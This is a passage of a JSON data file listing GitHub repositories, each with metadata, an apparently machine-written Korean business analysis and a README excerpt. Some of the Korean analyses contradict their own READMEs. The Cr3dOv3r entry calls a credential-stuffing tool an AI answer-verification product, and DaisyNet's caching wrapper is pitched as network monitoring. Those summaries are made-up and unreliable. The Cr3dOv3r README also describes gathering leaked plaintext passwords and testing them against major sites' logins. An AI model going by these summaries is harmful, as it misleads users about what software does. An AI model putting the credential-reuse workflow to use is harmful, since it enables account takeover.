best<sup>[1](#footnote)</sup> links of the week for iOS developers. \n\nHi there! I'm [Marius](https://twitter.com/marius_const). I'm an iOS developer who's been working in this industry for almost 10 years now. I'm passionate about what I do and I like to stay up to date with the latest news and trends on iOS development. Since I read a lot of articles about iOS development, it makes sense to gather them somewhere. I've \"inherited\" this newsletter in 2017 from [Rui](https://twitter.com/peres) and [Tiago](https://twitter.com/_tiagoalmeida), and since then I try to share the best articles of the week while keeping a focus on new voices in our community. If you are one of those new voices in our community, feel free to open a pull request and add your content, or just reach out [here](https://githu","composite_score":0.396,"license_safety_tag":"unknown"},{"name":"davidrmiller/biosim4","github_url":"https://github.com/davidrmiller/biosim4","stars":13,"language":"C++","license":"NOASSERTION","abandonment_months":19,"description":"# biosim4 분석 보고서\n\n## 왜 보물인가\n생물의 진화 과정을 컴퓨터로 시뮬레이션하는 교육용·연구용 도구로, 복잡한 생명 현상을 시각적으로 이해할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 교육 SaaS 플랫폼**\n- 대학 생물학과, 고등학교 과학 수업을 위한 온라인 진화 시뮬레이션 구독 서비스\n\n**2. 기업 내부 교육 도구**\n- 제약회","readme_excerpt":"# biosim4\n\n## Status\n\nThis project is transitioning to maintenance-only. Thanks to all who contributed \nimprovements to this project. We will continue to welcome bug fixes that enable this\nprogram to compile and execute, and we welcome discussions about this program\nand related topics in the Issues section.\n\n## What is this?\n\nThis pile of code was used to simulate biological creatures that evolve through natural selection.\nThe results of the experiments are summarized in this YouTube video:\n\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"I programmed some creatures. They evolved.\"\n\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;https://www.youtube.com/watch?v=N3tRFayqVtk\n\nThis command line program lacks a friendly interface, so compiling and executing the program may\nrequire attention to details. If you ask questions in the Issues,\nI'll try to help if I can. For a nicer user interface, check out the\n[fork of this project](https://github.com/ilyabrilev/biosim4) hosted by @ilyabrilev.\n\nDocument Contents\n----","composite_score":0.3959,"license_safety_tag":"unknown"},{"name":"florent37/ShapeOfView","github_url":"https://github.com/florent37/ShapeOfView","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":15,"description":"# ShapeOfView 비즈니스 분석\n\n## 왜 보물인가\n앱이나 웹사이트의 UI를 자유롭게 디자인할 수 있게 해주는 개발자용 도구로, 독특한 모양의 버튼이나 창을 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디자인 기능이 필요한 그래픽 편집 도구나 앱 빌더 플랫폼에 내장하여 구독료 인상\n2. **내부 업무 도구**: ","readme_excerpt":"# ShapeOfView\n\n[![CircleCI](https://circleci.com/gh/florent37/ShapeOfView/tree/master.svg?style=svg)](https://circleci.com/gh/florent37/ShapeOfView/tree/master)\n\nGive a custom shape to any android view\nUseful for Material Design 2\n\n[![screen](https://raw.githubusercontent.com/florent37/ShapeOfView/master/medias/shrine.gif)](https://www.github.com/florent37/ShapeOfView)\n[![screen](https://raw.githubusercontent.com/florent37/ShapeOfView/master/medias/sample_diagonal.gif)](https://www.github.com/florent37/ShapeOfView)\n[![screen](https://raw.githubusercontent.com/florent37/ShapeOfView/master/medias/sample_arc.gif)](https://www.github.com/florent37/ShapeOfView)\n\n<a href=\"https://goo.gl/WXW8Dc\">\n  <img alt=\"Android app on Google Play\" src=\"https://developer.android.com/images/brand/en_app_rgb_wo_45.png\" />\n</a>\n\n*Breaking change*\n\nthe old package `com.github.florent37` has been replaced by `io.github.florent37`\n\n# Download\n\n<a href='https://ko-fi.com/A160LCC' target='_blank'><img height='36'","composite_score":0.3958,"license_safety_tag":"safe"},{"name":"qwerty472123/wxappUnpacker","github_url":"https://github.com/qwerty472123/wxappUnpacker","stars":6,"language":"","license":"unknown","abandonment_months":74,"description":"# wxappUnpacker 보물 분석\n\n## 왜 보물인가\n스마트폰 앱 설치 파일을 분석하고 내용을 추출할 수 있는 도구로, 앱 개발사들의 보안 감시 및 경쟁사 분석에 필요한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **앱 보안 감시 서비스**: 기업들이 자사 앱이 불법 복제되지 않았는지 정기적으로 검사하는 SaaS 플랫폼\n- **앱 품질 검증 도구","readme_excerpt":"# wxappUnpacker\n","composite_score":0.3953,"license_safety_tag":"unknown"},{"name":"wesbos/Advanced-React","github_url":"https://github.com/wesbos/Advanced-React","stars":13,"language":"JavaScript","license":"unknown","abandonment_months":30,"description":"# wesbos/Advanced-React 상품화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필수적인 최신 기술을 배우는 교육 자료로, 프로그래머들이 자신의 실력을 한 단계 업그레이드하는 데 직접 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 월 구독제로 영상 강의와 실습 자료를 제공하는 유료 교육 서비스\n2. **기","readme_excerpt":"![Advanced React & GraphQL](https://advancedreact.com/images/ARG/arg-facebook-share.png)\n\n# Advanced React & GraphQL\n\nThese are the starter files and stepped solutions for the [Advanced React & GraphQL](https://AdvancedReact.com) course by [Wes Bos](https://WesBos.com/).\n\n## Getting Help\n\nThe best place to get help is in the #advanced-react slack room - there is a link in your course dashboard.\n\n## FAQ\n\n**Q:** Which Extensions for VS Code is Wes using?  \n**A:** All my extensions are listed on [my dotfiles repo](https://github.com/wesbos/dotfiles), but specifically this course uses [ESLint](https://github.com/Microsoft/vscode-eslint) and [Prettier](https://github.com/prettier/prettier-vscode).\n","composite_score":0.3949,"license_safety_tag":"unknown"},{"name":"rastapasta/mapscii","github_url":"https://github.com/rastapasta/mapscii","stars":11,"language":"JavaScript","license":"mit","abandonment_months":19,"description":"# mapscii 저장소 분석\n\n## 왜 보물인가\n터미널(검은 화면)에서 지도를 텍스트로 표현하는 독특한 기술로, 저사양 환경이나 제한된 환경에서도 지도를 볼 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **서버 모니터링 대시보드**: 원격 접속한 서버에서 위치 정보가 필요할 때 텍스트 기반 지도로 표시\n2. **IoT 디바이스 관리 도구**: 사물","readme_excerpt":"# MapSCII - The Whole World In Your Console. [![Build Status](https://travis-ci.com/rastapasta/mapscii.svg?branch=master)](https://travis-ci.com/rastapasta/mapscii)\n\nA node.js based [Vector Tile](http://wiki.openstreetmap.org/wiki/Vector_tiles) to [Braille](http://www.fileformat.info/info/unicode/block/braille_patterns/utf8test.htm) and [ASCII](https://de.wikipedia.org/wiki/American_Standard_Code_for_Information_Interchange) renderer for [xterm](https://en.wikipedia.org/wiki/Xterm)-compatible terminals.\n\n<a href=\"https://asciinema.org/a/117813?autoplay=1\" target=\"_blank\">![asciicast](https://cloud.githubusercontent.com/assets/1259904/25480718/497a64e2-2b4a-11e7-9cf0-ed52ee0b89c0.png)</a>\n\n## Try it out!\n\n```sh\n$ telnet mapscii.me\n```\n\nIf you're on Windows, use the open source telnet client [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) to connect.\n\n## Features\n\n* Use your mouse to drag and zoom in and out!\n* Discover Point-of-Interests around any given location","composite_score":0.3947,"license_safety_tag":"safe"},{"name":"xing1357/SimpleOS","github_url":"https://github.com/xing1357/SimpleOS","stars":9,"language":"C","license":"MIT","abandonment_months":19,"description":"# SimpleOS 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 핵심 운영 체제를 처음부터 만드는 교육용 프로젝트로, 기술 학습과 상용화 모두 가능한 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 SaaS**: 프로그래밍 학원이나 온라인 코딩 교육 플랫폼에서 \"운영체제 원리\" 실습 강의로 제공\n2. **기업 교육 도구**: 대기업의 신입 개발자 교","readme_excerpt":"# SimpleOS\nA simple DOS like OS made in Assembly and C. \n\n## Build\nRun with `make all`. \n\n## Run\nTo run the OS, you can download VM software.\nThe iso Image is in the `iso` folder.\nReccomended:\n- [Virtualbox](https://www.virtualbox.org/wiki/Downloads)\n- [VMware](https://my.vmware.com/web/vmware/downloads/info/slug/desktop_end_user_computing/vmware_fusion/12_0)\n- [QEMU](https://www.qemu.org)\n\n### Running with VMWARE/Virtualbox\nTo run with this, simply insert the iso image, and make sure to chose the `other` option.\n\n### Running with qemu\nRun with `make run`.\n\n## Source\nThe source is in the `src` Folder\n\n","composite_score":0.3947,"license_safety_tag":"safe"},{"name":"eth0izzle/bucket-stream","github_url":"https://github.com/eth0izzle/bucket-stream","stars":195,"language":"Python","license":"MIT","abandonment_months":15,"description":"# bucket-stream 상용화 분석\n\n## 왜 보물인가\n인터넷에 공개된 클라우드 저장소의 민감한 파일들을 자동으로 찾아내는 보안 감시 도구로, 기업의 실수로 인한 정보 유출을 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 모니터링 SaaS**: 월간 구독 형태로 회사의 클라우드 저장소를 24/7 감시하고 위험한 파일이 발견되","readme_excerpt":"# 🚨 Bucket Stream is no longer maintained. If you need support or consultation for your red teaming endeavours, drop me an e-mail paul@darkport.co.uk 🚨\n\n# Bucket Stream\n\n**Find interesting Amazon S3 Buckets by watching certificate transparency logs.**\n\nThis tool simply listens to various certificate transparency logs (via certstream) and attempts to find public S3 buckets from permutations of the certificates domain name.\n\n![Demo](https://i.imgur.com/ZFkIYhD.jpg)\n\n**Be responsible**. I mainly created this tool to highlight the risks associated with public S3 buckets and to put a different spin on the usual dictionary based attacks. Some quick tips if you use S3 buckets:\n\n1) Randomise your bucket names! There is no need to use `company-backup.s3.amazonaws.com`.\n2) Set appropriate permissions and audit regularly. If possible create two buckets - one for your public assets and another for private data.\n3) Be mindful about **your data**. What are suppliers, contractors and third parties do","composite_score":0.3946,"license_safety_tag":"safe"},{"name":"android/animation-samples","github_url":"https://github.com/android/animation-samples","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":18,"description":"# android/animation-samples 분석\n\n## 왜 보물인가\n안드로이드 앱에서 부드럽고 자연스러운 화면 전환 효과를 쉽게 만들 수 있는 실무 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 모바일 앱**: 금융 앱이나 소셜 미디어 플랫폼에서 사용자 경험을 향상시키는 애니메이션 기능 제공\n2. **내부 업무 도구**: 기업의 안드","readme_excerpt":"> **Warning**\n> This sample has been deprecated and is no longer being maintained.\n> \n> To find other samples that may be of interest, see [https://developer.android.com/samples](https://developer.android.com/samples).\n\nAndroid Animation Samples Repository\n====================================\n\nThis repository contains a set of individual Android Studio projects to help you get\nstarted writing/understanding Android animation features.\n","composite_score":0.3946,"license_safety_tag":"safe"},{"name":"react-spring/zustand","github_url":"https://github.com/react-spring/zustand","stars":41,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<p align=\"center\">\n  <img src=\"./docs/bear.jpg\" />\n</p>\n\n[![Build Status](https://img.shields.io/github/actions/workflow/status/pmndrs/zustand/test.yml?branch=main&style=flat&colorA=000000&colorB=000000)](https://github.com/pmndrs/zustand/actions?query=workflow%3ATest)\n[![Build Size](https://img.shields.io/badge/dynamic/json?url=https%3A%2F%2Fdeno.bundlejs.com%2F%3Fq%3Dzustand&query=%24.size.uncompressedSize&style=flat&label=bundle%20size&colorA=000000&colorB=000000)](https://bundlejs.com/?q=zustand)\n[![Version](https://img.shields.io/npm/v/zustand?style=flat&colorA=000000&colorB=000000)](https://www.npmjs.com/package/zustand)\n[![Downloads](https://img.shields.io/npm/dt/zustand.svg?style=flat&colorA=000000&colorB=000000)](https://www.npmjs.com/package/zustand)\n[![Discord Shield](https://img.shields.io/discord/740090768164651008?style=flat&colorA=000000&colorB=000000&label=discord&logo=discord&logoColor=ffffff)](https://discord.gg/poimandres)\n\n<a href=\"https://dai-shi.github.io/zustand-","composite_score":0.3945,"license_safety_tag":"safe"},{"name":"vuelidate/vuelidate","github_url":"https://github.com/vuelidate/vuelidate","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":12,"description":"# Vuelidate 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 사용자가 입력한 정보가 올바른지 자동으로 확인해주는 검증 도구로, 개발자들이 반복적으로 작성하는 코드를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원가입/로그인 폼에서 이메일, 비밀번호 유효성을 실시간으로 검사하는 온라인 협업 도구\n- **내부 업","readme_excerpt":"# vuelidate\n\n> Simple, lightweight model-based validation for Vue.js 2.x & 3.0\n\nVisit [Vuelidate Docs](https://vuelidate-next.netlify.app) for detailed instructions.\n\n## Sponsors\n\n<p align=\"center\">\n  <a href=\"https://getform.io/\" target=\"_blank\">\n    <img src=\"https://cdn.discordapp.com/attachments/1002927810710605875/1034915542596845728/getform.png\" alt=\"Get Form\" width=\"240px\">\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.storyblok.com/developers?utm_source=newsletter&utm_medium=logo&utm_campaign=vuejs-newsletter\" target=\"_blank\">\n    <img src=\"https://a.storyblok.com/f/51376/3856x824/fea44d52a9/colored-full.png\" alt=\"Storyblok\" width=\"240px\">\n  </a>\n</p>\n\n\n<p align=\"center\">\n  <a href=\"https://www.vuemastery.com/\" target=\"_blank\">\n    <img src=\"https://cdn.discordapp.com/attachments/258614093362102272/557267759130607630/Vue-Mastery-Big.png\" alt=\"Vue Mastery logo\" width=\"180px\">\n  </a>\n</p>\n\n## Installation\n\nYou can use Vuelidate just by itself, but we suggest you use it a","composite_score":0.3938,"license_safety_tag":"safe"},{"name":"D4Vinci/Cr3dOv3r","github_url":"https://github.com/D4Vinci/Cr3dOv3r","stars":6,"language":"Python","license":"MIT","abandonment_months":6,"description":"# D4Vinci/Cr3dOv3r 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 잘못된 답변을 자동으로 검증해서 걸러내는 기술로, 신뢰도가 중요한 모든 AI 서비스의 가장 큰 약점을 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 고객 상담 AI 챗봇 SaaS**\n- 금융사, 보험사, 법률사무소 등이 AI 상담사를 도입할 때 잘못된 조언을 방지하는 필수 ","readme_excerpt":"# Cr3dOv3r [![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) ![Build Status](https://img.shields.io/badge/Version-0.4.4-red.svg)\n\n**Your best friend in credential reuse attacks.**\n\nYou give Cr3dOv3r an email then it does two simple useful jobs with it:\n- Search for public leaks for the email and returns the result with the most useful details about the leak (Using haveibeenpwned API) and tries to get the plain text passwords from leaks it find (Using [@GhostProjectME](https://twitter.com/GhostProjectME)).\n- Now you give it a password or a leaked password then it tries this credentials against some well-known websites (ex: Facebook, Twitter, Google...), tells if the login successful and if there's captcha some where blocking our way!\n\n### Some of the scenarios Cr3dOv3r can be used in it\n- Check if the targeted email is in any leaks and t","composite_score":0.3937,"license_safety_tag":"safe"},{"name":"liuruoze/EasyPR","github_url":"https://github.com/liuruoze/EasyPR","stars":6,"language":"C++","license":"apache-2.0","abandonment_months":24,"description":"# EasyPR 저장소 분석\n\n## 왜 보물인가\n자동차 번호판을 사진으로 찍으면 자동으로 인식해주는 기술로, 주차관리·교통단속·물류추적 등 실제 비즈니스에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 주차장 관리 시스템에서 입출차 자동 기록 및 요금 정산 자동화\n- **내부 업무 도구**: 물류회사의 화물차 입고/출고 관리","readme_excerpt":"# EasyPR\n\nEasyPR是一个开源的中文车牌识别系统，其目标是成为一个简单、高效、准确的非限制场景(unconstrained situation)下的车牌识别库。\n\n相比于其他的车牌识别系统，EasyPR有如下特点：\n\n* 它基于openCV这个开源库。这意味着你可以获取全部源代码，并且移植到opencv支持的所有平台。\n* 它能够识别中文。例如车牌为苏EUK722的图片，它可以准确地输出std:string类型的\"苏EUK722\"的结果。\n* 它的识别率较高。图片清晰情况下，车牌检测与字符识别可以达到80%以上的精度。\n\n### 更新\n\n本次更新版本是1.6正式版本，主要有以下几点更新：\n\n1. 修正了多项readme的文本提示。\n\n2. 增加了C#调用EasyPR的一个项目的链接，感谢 @zhang-can 同学。\n\n\n**注意**\n\n1. 对于Opencv3.2或以上版本，如果碰到编译问题，例如“ANN_MLP”相关的错误，尝试将config.h中将#define CV_VERSION_THREE_ZERO改为#define CV_VERSION_THREE_TWO试试.\n\n2. linux系统推荐使用Opencv3.2以上版本。3.2以下的版本例如3.0和3.1在识别时可能会出现车牌识别结果为空的情况。稳妥起见，建议都升级到最新的3.2版本。Windows版本没有这个问题。\n\n## 待做的工作\n- [ ] 完成一个CNN框架\n- [ ] 替换ANN为CNN\n- [ ] 增加新能源车的识别（待定）\n- [ ] 增加两行车牌的识别（待定）\n\n### 跨平台\n\n目前除了windows平台以外，还有以下其他平台的EasyPR版本。一些平台的版本可能会暂时落后于主平台。\n\n现在有一个无需配置opencv的1.5版本的[懒人版](http://git.oschina.net/easypr/EasyPR/attach_files)。仅仅支持vs2013，也只能在debug和x86下运行，其他情况的话还是得配置opencv。感谢范文捷同学的帮助。页面里的两个文件都要下载，下载后用[7zip](http://www.7-zip.org/)解压。\n\n|版本 | 开发者 | 版本 | 地址 \n|------|-------|-------|-------\n| C# | ","composite_score":0.3922,"license_safety_tag":"safe"},{"name":"NLPchina/ansj_seg","github_url":"https://github.com/NLPchina/ansj_seg","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":31,"description":"# NLPchina/ansj_seg 분석 보고서\n\n## 왜 보물인가\n한국어, 중국어 등 아시아 언어를 정확하게 분석하고 단어를 인식하는 기술로, 검색, 번역, 챗봇 등 언어 관련 서비스의 핵심 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **검색 엔진 SaaS**: 온라인 쇼핑몰, 문서 관리 시스템의 검색 기능을 더 똑똑하게 만들어 구독료로 판매\n2. ","readme_excerpt":"Ansj中文分词\n==================\n\n [![1.X Build Status](https://travis-ci.org/NLPchina/ansj_seg.svg?branch=master)](https://travis-ci.org/NLPchina/ansj_seg) [![Gitter](https://badges.gitter.im/NLPchina/ansj_seg.svg)](https://gitter.im/NLPchina/ansj_seg?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\n\n#####  使用帮助\n* 开发文档：[3.x版本及之前](http://nlpchina.github.io/ansj_seg/)，[5.x版本及之后](https://github.com/NLPchina/ansj_seg/wiki)\n\n\n\n##### 摘要\n> 这是一个基于n-Gram+CRF+HMM的中文分词的java实现。\n\n> 分词速度达到每秒钟大约200万字左右（mac air下测试），准确率能达到96%以上。\n\n> 目前实现了中文分词、中文姓名识别、用户自定义词典、关键字提取、自动摘要、关键字标记等功能。\n\n> 可以应用到自然语言处理等方面，适用于对分词效果要求高的各种项目。\n\n\n\n\n#####  maven\n\n````\n        \n        <dependency>\n            <groupId>org.ansj</groupId>\n            <artifactId>ansj_seg</artifactId>\n            <version>5.1.1</version>\n        </dependency>\n    \n````\n\n#####  调用demo\n\n如果你第一次下载只想测试测试效果可以调用这个简易接口\n\n<pre><code>\n String str = \"欢迎使用ansj_seg,(ansj中文分词)在这里如果你遇到什么问题都可以联系我.我一定尽我所能.帮助大家.ansj_seg更快,更准,更自由!\" ;\n System.out.println(ToAnalysis.parse","composite_score":0.3914,"license_safety_tag":"safe"},{"name":"MQZHot/DaisyNet","github_url":"https://github.com/MQZHot/DaisyNet","stars":14,"language":"Swift","license":"MIT","abandonment_months":16,"description":"# DaisyNet 저장소 분석\n\n## 왜 보물인가\n최근 업데이트된 신규 네트워크 기술로, 14개의 관심 표시를 받으며 잠재력 있는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **네트워크 분석 SaaS**: 기업의 네트워크 성능을 실시간으로 모니터링하는 웹 서비스로 제공\n2. **내부 IT 관리 도구**: 회사 IT 부서가 직원들의 네트워크 ","readme_excerpt":"\n## DaisyNet\n\n![](https://img.shields.io/badge/support-swift%204%2B-green.svg)   ![](https://img.shields.io/cocoapods/v/DaisyNet.svg?style=flat)\n\n对[Alamofire](https://github.com/Alamofire/Alamofire)与[Cache](https://github.com/hyperoslo/Cache)的封装实现对网络数据的缓存，可以存储JSON，String，Data.\n\n\n<p align=\"center\">\n<img src=\"https://github.com/MQZHot/DaisyNet/raw/master/Picture/get.gif\">\n</p>\n\n## 使用\n\n* 缓存数据需要调用`.cacheIdentifier(identifier)`，不调用或者`.cacheIdentifier(nil)`不缓存\n* 确保`identifier`是唯一的\n\n```swift\n/// 缓存标识\nlet identifier = \"home\"\n\n/// 网络请求\nDaisyNet.request(urlStr, params: params).cacheIdentifier(identifier).responseString(queue: .main) { result in\n    switch result {\n    case .success(let string):\n        self.textView.text = string\n        print(Thread.current)\n    case .failure(let error):\n        print(error)\n    }\n}\n```\n\n* 读取缓存\n\n```swift\n/// 缓存标识\nlet identifier = \"home\"\n\n/// 读取缓存\nlet cacheString = DaisyNet.cacheString(with: identifier)\nlet cacheData = DaisyNet.cacheData(with: identifier)\nlet ca","composite_score":0.3911,"license_safety_tag":"safe"},{"name":"knightliao/disconf","github_url":"https://github.com/knightliao/disconf","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":35,"description":"# disconf 프로젝트 분석\n\n## 왜 보물인가\n여러 서버에 흩어진 설정값들을 한 곳에서 통일하여 관리할 수 있게 해주는 도구로, 대규모 서비스 운영 시 발생하는 설정 오류를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 이커머스 플랫폼이 수백 개 서버의 가격정책, 보안설정을 실시간으로 일괄 수정\n-","readme_excerpt":"Disconf \n=======\n\n[![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt)\n[![Build Status](https://travis-ci.org/knightliao/disconf.svg?branch=master)](https://travis-ci.org/knightliao/disconf) \n[![Coverage Status](https://coveralls.io/repos/knightliao/disconf/badge.png?branch=master)](https://coveralls.io/r/knightliao/disconf?branch=master)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.baidu.disconf/disconf-client/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.baidu.disconf/disconf-client)\n\nDistributed Configuration Management Platform(分布式配置管理平台) \n\n专注于各种「分布式系统配置管理」的「通用组件」和「通用平台」, 提供统一的「配置管理服务」\n\n![](http://ww3.sinaimg.cn/mw1024/60c9620fjw1esvjzny1rmj20aj061t9a.jpg)\n\n包括 **百度**、**滴滴出行**、**银联**、**网易**、**拉勾网**、**苏宁易购**、**顺丰科技** 等知名互联网公司正在使用!\n\n[「disconf」在「2015 年度新增开源软件排名 TOP 100(OSC开源中国提供)」中排名第16强。](http://www.oschina.net/news/69808/2015-annual-ranking-top-100-new-open","composite_score":0.3906,"license_safety_tag":"safe"},{"name":"ddangelov/Top2Vec","github_url":"https://github.com/ddangelov/Top2Vec","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":19,"description":"# Top2Vec 저장소 분석\n\n## 왜 보물인가\n문서나 뉴스 같은 텍스트 더미에서 자동으로 주요 주제를 찾아내는 AI 도구로, 수동으로 분류하던 작업을 완전 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 기업의 고객 피드백, 리뷰, SNS 댓글을 자동으로 분석하여 불만사항과 칭찬 포인트를 한눈에 정리해주는 분석 플랫폼\n\n**","readme_excerpt":"[![](https://img.shields.io/pypi/v/top2vec.svg)](https://pypi.org/project/top2vec/)\n[![](https://img.shields.io/pypi/l/top2vec.svg)](https://github.com/ddangelov/Top2Vec/blob/master/LICENSE)\n[![](https://readthedocs.org/projects/top2vec/badge/?version=latest)](https://top2vec.readthedocs.io/en/latest/?badge=latest)\n[![](https://img.shields.io/badge/arXiv-2008.09470-00ff00.svg)](http://arxiv.org/abs/2008.09470)\n\n\n<!--![](https://raw.githubusercontent.com/ddangelov/Top2Vec/master/images/top2vec_logo.png?sanitize=true)-->\n<p align=\"center\">\n    <img src=\"https://raw.githubusercontent.com/ddangelov/Top2Vec/master/images/top2vec_logo.svg\" alt=\"\" width=600 height=\"whatever\">\n</p>\n\n# Contextual Top2Vec Overview\nPaper: [Topic Modeling: Contextual Token Embeddings Are All You Need](https://aclanthology.org/2024.findings-emnlp.790.pdf)\n\nThe Top2Vec library now supports a new contextual version, allowing for deeper topic modeling capabilities. **Contextual Top2Vec**, enables the model to generate","composite_score":0.3905,"license_safety_tag":"safe"},{"name":"mwaterfall/MWPhotoBrowser","github_url":"https://github.com/mwaterfall/MWPhotoBrowser","stars":5,"language":"Objective-C","license":"mit","abandonment_months":23,"description":"# MWPhotoBrowser 상품화 분석\n\n## 왜 보물인가\n스마트폰이나 컴퓨터에서 사진을 보기 좋게 정렬하고 넘겨볼 수 있는 기능을 앱에 간단히 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 부동산 중개 플랫폼이 매물 사진을 갤러리처럼 보여주는 기능 추가\n2. **내부 업무 도구**: 의료 기관의 진료 영상 기록이","readme_excerpt":"# MWPhotoBrowser\n\n<!--[![CI Status](http://img.shields.io/travis/Michael Waterfall/MWPhotoBrowser.svg?style=flat)](https://travis-ci.org/Michael Waterfall/MWPhotoBrowser)-->\n[![Version](https://img.shields.io/cocoapods/v/MWPhotoBrowser.svg?style=flat)](http://cocoapods.org/pods/MWPhotoBrowser)\n[![License](https://img.shields.io/cocoapods/l/MWPhotoBrowser.svg?style=flat)](http://cocoapods.org/pods/MWPhotoBrowser)\n[![Platform](https://img.shields.io/cocoapods/p/MWPhotoBrowser.svg?style=flat)](http://cocoapods.org/pods/MWPhotoBrowser)\n\n[![Flattr this git repo](http://api.flattr.com/button/flattr-badge-large.png)](https://flattr.com/submit/auto?user_id=mwaterfall&url=https://github.com/mwaterfall/MWPhotoBrowser&title=MWPhotoBrowser&language=&tags=github&category=software)\n\n## A simple iOS photo and video browser with optional grid view, captions and selections.\n\nMWPhotoBrowser can display one or more images or videos by providing either `UIImage` objects, `PHAsset` objects, or URLs to libr","composite_score":0.3903,"license_safety_tag":"safe"},{"name":"IvanVorobei/SPPermission","github_url":"https://github.com/IvanVorobei/SPPermission","stars":5,"language":"Swift","license":"MIT","abandonment_months":14,"description":"# SPPermission 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱이 사용자의 위치, 카메라, 연락처 등에 접근할 때 필요한 '허용' 화면을 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 회사**: 배달앱, 지도앱, 사진 공유 앱 등에서 권한 요청 화면을 표준화된 방식으로 제공\n2. **노코드 앱 빌더**: 프로그래머가","readme_excerpt":"# PermissionsKit \n\nUniversal API for request permission and get its statuses — available `.authorized`, `.denied` & `.notDetermined`.\n\n<p float=\"left\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/camera.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/photos.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/notifications.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/location.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/microphone.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/calendar.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/contacts.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/reminders.png\" width=\"38\">\n    <img src=\"https://cdn.sparrowcode.io/github/permissionskit/icons/motion.png\" wid","composite_score":0.3902,"license_safety_tag":"safe"},{"name":"request/request","github_url":"https://github.com/request/request","stars":8,"language":"JavaScript","license":"apache-2.0","abandonment_months":22,"description":"# request/request 저장소 분석\n\n## 왜 보물인가\n웹 서비스 간 데이터를 주고받을 때 필요한 기본 도구로, 전 세계 수백만 개발자가 사용하는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 외부 API와 연동하는 클라우드 서비스(예: 회계 소프트웨어가 은행 연결)\n2. **내부 업무 도구**: 회사 내 다양한 시","readme_excerpt":"# Deprecated!\n\nAs of Feb 11th 2020, request is fully deprecated. No new changes are expected to land. In fact, none have landed for some time.\n\nFor more information about why request is deprecated and possible alternatives refer to\n[this issue](https://github.com/request/request/issues/3142).\n\n# Request - Simplified HTTP client\n\n[![npm package](https://nodei.co/npm/request.png?downloads=true&downloadRank=true&stars=true)](https://nodei.co/npm/request/)\n\n[![Build status](https://img.shields.io/travis/request/request/master.svg?style=flat-square)](https://travis-ci.org/request/request)\n[![Coverage](https://img.shields.io/codecov/c/github/request/request.svg?style=flat-square)](https://codecov.io/github/request/request?branch=master)\n[![Coverage](https://img.shields.io/coveralls/request/request.svg?style=flat-square)](https://coveralls.io/r/request/request)\n[![Dependency Status](https://img.shields.io/david/request/request.svg?style=flat-square)](https://david-dm.org/request/request)\n[![K","composite_score":0.3901,"license_safety_tag":"safe"},{"name":"jmcdo29/testing-nestjs","github_url":"https://github.com/jmcdo29/testing-nestjs","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":13,"description":"# jmcdo29/testing-nestjs 평가 보고서\n\n## 왜 보물인가\n소프트웨어 품질을 자동으로 검증하는 기술로, 개발 과정에서 사람의 실수를 미리 잡아내는 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀이 코드를 제출하면 자동으로 테스트 품질을 점수화해주는 온라인 서비스\n2. **내부 업무 도구**: 대형 IT 회","readme_excerpt":"<div align=\"center\">\n\n[![Commitizen 